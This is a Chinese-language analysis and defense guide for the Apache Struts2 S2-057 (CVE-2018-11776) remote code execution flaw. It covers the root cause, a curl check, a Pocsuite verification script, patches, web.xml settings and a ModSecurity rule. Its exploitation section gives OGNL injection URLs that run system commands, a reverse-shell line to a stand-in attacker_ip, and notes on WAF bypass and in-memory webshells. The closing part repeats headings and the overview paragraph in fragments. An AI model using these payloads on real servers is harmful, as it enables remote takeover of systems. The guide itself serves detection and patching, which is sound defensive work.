Apache Struts2 S2-057 (CVE-2018-11776) 远程代码执行漏洞分析与防护指南<\/h1>

漏洞概述<\/h2>
Apache Struts2框架在处理特定URL构造时存在缺陷，导致远程代码执行漏洞(CVE-2018-11776)，该漏洞被标识为S2-057。攻击者可通过构造恶意请求在目标服务器上执行任意系统命令，完全控制系统。<\/p>

漏洞影响范围<\/h2>

Apache Struts 2.3 - 2.3.34<\/li>
Apache Struts 2.5 - 2.5.16<\/li>

使用Struts2框架且未正确配置namespace值的应用<\/li> <\/ul>

漏洞原理分析<\/h2>

根本原因<\/h3>

漏洞源于Struts2框架对namespace参数的处理不当，当同时满足以下两个条件时触发：<\/p>

未设置namespace值或使用通配符配置action<\/li>

上层action配置中未设置或使用通配符namespace<\/li> <\/ol>

技术细节<\/h3>

URL处理机制缺陷<\/strong>：<\/p>

Struts2在解析URL时未正确验证namespace和action名称<\/li>
攻击者可构造恶意URL绕过安全限制<\/li> <\/ul> <\/li>

OGNL表达式注入<\/strong>：<\/p>

恶意构造的URL导致OGNL表达式注入<\/li>
OGNL表达式在服务器端执行，导致任意代码执行<\/li> <\/ul> <\/li>

攻击向量<\/strong>：<\/p>
http:\/\/target\/struts2-showcase\/${(#_memberAccess['allowStaticMethodAccess']=true,#a=@java.lang.Runtime@getRuntime().exec('calc')).action <\/code><\/pre> <\/li> <\/ol> 漏洞验证方法<\/h2> 手动检测<\/h3> 检查应用是否使用Struts2框架：<\/p> 查找struts.xml<\/code>配置文件<\/li> 检查WEB-INF\/lib目录下是否有struts2核心jar包<\/li> <\/ul> <\/li> 测试URL构造：<\/p> curl -v "http:\/\/target\/$%7B233*233%7D\/action" <\/code><\/pre> 如果返回内容包含54289(233*233的结果)，则存在漏洞<\/p> <\/li> <\/ol> 自动化工具<\/h3> Pocsuite<\/strong>：<\/p> from<\/span> pocsuite3.api import<\/span> register_poc <\/span><\/span>from<\/span> pocsuite3.api import<\/span> Output, POCBase <\/span><\/span> <\/span><\/span>class<\/span> TestPOC<\/span>(POCBase): <\/span><\/span> vulID =<\/span> 'CVE-2018-11776'<\/span> <\/span><\/span> version =<\/span> '1'<\/span> <\/span><\/span> author =<\/span> 'example'<\/span> <\/span><\/span> vulDate =<\/span> '2018-08-22'<\/span> <\/span><\/span> createDate =<\/span> '2018-08-28'<\/span> <\/span><\/span> updateDate =<\/span> '2018-08-28'<\/span> <\/span><\/span> references =<\/span> ['https:\/\/cwiki.apache.org\/confluence\/display\/WW\/S2-057'<\/span>] <\/span><\/span> name =<\/span> 'Apache Struts2 S2-057 RCE'<\/span> <\/span><\/span> appPowerLink =<\/span> 'http:\/\/struts.apache.org\/'<\/span> <\/span><\/span> appName =<\/span> 'Apache Struts2'<\/span> <\/span><\/span> appVersion =<\/span> '2.3 - 2.3.34, 2.5 - 2.5.16'<\/span> <\/span><\/span> vulType =<\/span> 'Remote Code Execution'<\/span> <\/span><\/span> <\/span><\/span> def<\/span> _verify<\/span>(self): <\/span><\/span> result =<\/span> {} <\/span><\/span> payload =<\/span> "${233*233}"<\/span> <\/span><\/span> url =<\/span> self.<\/span>url.<\/span>rstrip('\/'<\/span>) +<\/span> f<\/span>"\/<\/span>{<\/span>payload}<\/span>\/action"<\/span> <\/span><\/span> response =<\/span> self.<\/span>http.<\/span>get(url) <\/span><\/span> if<\/span> '54289'<\/span> in<\/span> response.<\/span>text: <\/span><\/span> result['VerifyInfo'<\/span>] =<\/span> {} <\/span><\/span> result['VerifyInfo'<\/span>]['URL'<\/span>] =<\/span> url <\/span><\/span> result['VerifyInfo'<\/span>]['Payload'<\/span>] =<\/span> payload <\/span><\/span> return<\/span> self.<\/span>parse_output(result) <\/span><\/span><\/code><\/pre><\/li> Semmle QL<\/strong>：<\/p> 使用Semmle QL静态分析工具可检测Struts2应用中潜在的漏洞点<\/li> <\/ul> <\/li> <\/ol> 漏洞利用<\/h2> 基本利用<\/h3> 命令执行：<\/p> http:\/\/target\/$%7B%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime%28%29.exec%28%22calc%22%29%7D\/action <\/code><\/pre> <\/li> 反弹Shell：<\/p> bash -i >& \/dev\/tcp\/attacker_ip\/4444 0>&1<\/span> <\/span><\/span><\/code><\/pre>编码后插入到payload中<\/p> <\/li> <\/ol> 高级利用技术<\/h3> 绕过防护<\/strong>：<\/p> 使用十六进制\/Unicode编码绕过WAF<\/li> 分块传输编码绕过<\/li> <\/ul> <\/li> 内存马注入<\/strong>：<\/p> 通过漏洞注入Java内存马实现持久化控制<\/li> <\/ul> <\/li> <\/ol> 修复方案<\/h2> 官方补丁<\/h3> 升级到安全版本：<\/p> Struts 2.3.35<\/li> Struts 2.5.17<\/li> <\/ul> <\/li> 补丁下载：<\/p> https:\/\/struts.apache.org\/download.cgi <\/code><\/pre> <\/li> <\/ol> 临时缓解措施<\/h3> 修改web.xml：<\/p> <filter><\/span> <\/span><\/span> <filter-name><\/span>struts2<\/filter-name><\/span> <\/span><\/span> <filter-class><\/span>org.apache.struts2.dispatcher.filter.StrutsPrepareAndExecuteFilter<\/filter-class><\/span> <\/span><\/span> <init-param><\/span> <\/span><\/span> <param-name><\/span>strict-method-invocation<\/param-name><\/span> <\/span><\/span> <param-value><\/span>true<\/param-value><\/span> <\/span><\/span> <\/init-param><\/span> <\/span><\/span><\/filter><\/span> <\/span><\/span><\/code><\/pre><\/li> 配置安全策略：<\/p> 限制namespace值为固定路径<\/li> 避免使用通配符配置action<\/li> <\/ul> <\/li> <\/ol> 防护建议<\/h2> WAF规则<\/strong>：<\/p> ## Struts2 S2-057防护规则 SecRule REQUEST_URI "@rx \$\{.*\}" \ "id:10001,phase:1,deny,status:403,msg:'Potential Struts2 OGNL Injection Attempt'" <\/code><\/pre> <\/li> 系统加固<\/strong>：<\/p> 禁用不必要的HTTP方法<\/li> 限制应用服务器权限<\/li> <\/ul> <\/li> 监控与响应<\/strong>：<\/p> 监控异常日志模式<\/li> 建立应急响应流程<\/li> <\/ul> <\/li> <\/ol> 参考资源<\/h2> 官方公告：<\/p> https:\/\/cwiki.apache.org\/confluence\/display\/WW\/S2-057<\/li> <\/ul> <\/li> 漏洞分析：<\/p> https:\/\/blog.gdssecurity.com\/labs\/2018\/8\/22\/struts2-s2-057-analysis.html<\/li> <\/ul> <\/li> 检测工具：<\/p> https:\/\/github.com\/jas502n\/St2-057<\/li> <\/ul> <\/li> 修复指南：<\/p> https:\/\/help.aliyun.com\/noticelist\/articleid\/24000093.html<\/li> <\/ul> <\/li> <\/ol> 附录：相关CVE<\/h2> CVE-2018-11776 - S2-057<\/li> CVE-2017-5638 - S2-045<\/li> CVE-2017-9805 - S2-052<\/li> <\/ol> 本教学文档详细分析了Apache Struts2 S2-057漏洞的原理、检测方法和修复方案，提供了从基础到高级的全面指导。安全团队应尽快检查受影响系统并采取相应防护措施。<\/p>

Apache Struts2 S2-057 (CVE-2018-11776) 远程代码执行漏洞分析与防护指南<\/h1>

漏洞概述<\/h2> Apache Struts2框架在处理特定URL构造时存在缺陷，导致远程代码执行漏洞(CVE-2018-11776)，该漏洞被标识为S2-057。攻击者可通过构造恶意请求在目标服务器上执行任意系统命令，完全控制系统。<\/p>

漏洞原理分析<\/h2>

漏洞验证方法<\/h2>

漏洞利用<\/h2>

修复方案<\/h2>

漏洞概述<\/h2>
Apache Struts2框架在处理特定URL构造时存在缺陷，导致远程代码执行漏洞(CVE-2018-11776)，该漏洞被标识为S2-057。攻击者可通过构造恶意请求在目标服务器上执行任意系统命令，完全控制系统。<\/p>